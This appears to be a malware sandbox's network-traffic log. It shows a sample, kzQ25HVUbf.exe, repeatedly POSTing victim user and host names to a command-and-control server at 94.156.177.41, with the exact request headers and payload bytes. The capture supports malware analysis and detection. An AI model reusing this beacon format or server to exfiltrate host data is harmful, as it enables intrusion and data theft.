Jan 11, 2025 08:38:41.007462025 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:41.012347937 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:41.746803045 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.9	50072	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:41.963155985 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:41.968094110 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:42.661081076 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.9	50073	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:42.818146944 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:42.823353052 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:43.537935019 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.9	50074	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:43.693097115 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:43.698121071 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:44.418731928 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.9	50075	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:44.590822935 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:44.595801115 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:45.460211992 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.9	50076	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:45.623081923 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:45.627870083 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:46.348886013 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.9	50077	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:46.511816025 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:46.516710997 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:47.254199028 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.9	50078	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:47.419711113 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:47.424670935 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:48.123255968 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.9	50079	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:48.268551111 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:48.273475885 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:48.971910000 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.9	50080	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:49.111938000 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:49.116902113 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:49.815977097 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.9	50081	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:49.955159903 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:49.960016012 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:50.672028065 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.9	50082	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:50.818588972 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:50.825320959 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:51.546145916 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.9	50083	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:51.690907001 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:51.695758104 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:52.407480001 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.9	50084	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:52.550494909 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:52.555444002 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:53.254826069 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.9	50085	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:53.409419060 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:53.414346933 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:54.121906042 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.9	50086	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:54.268899918 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:54.273813009 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:54.976531029 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.9	50087	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:55.129506111 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:55.134434938 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:55.873589039 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.9	50088	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:56.031610012 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:56.036472082 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:56.739826918 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.9	50089	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:56.982789993 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:56.987644911 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:57.718441010 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.9	50090	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:57.865300894 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:57.870196104 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:58.557475090 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.9	50091	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:58.705477953 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:58.710491896 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:38:59.435040951 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:38:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.9	50092	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:38:59.650599957 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:38:59.655514002 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:00.362013102 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.9	50093	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
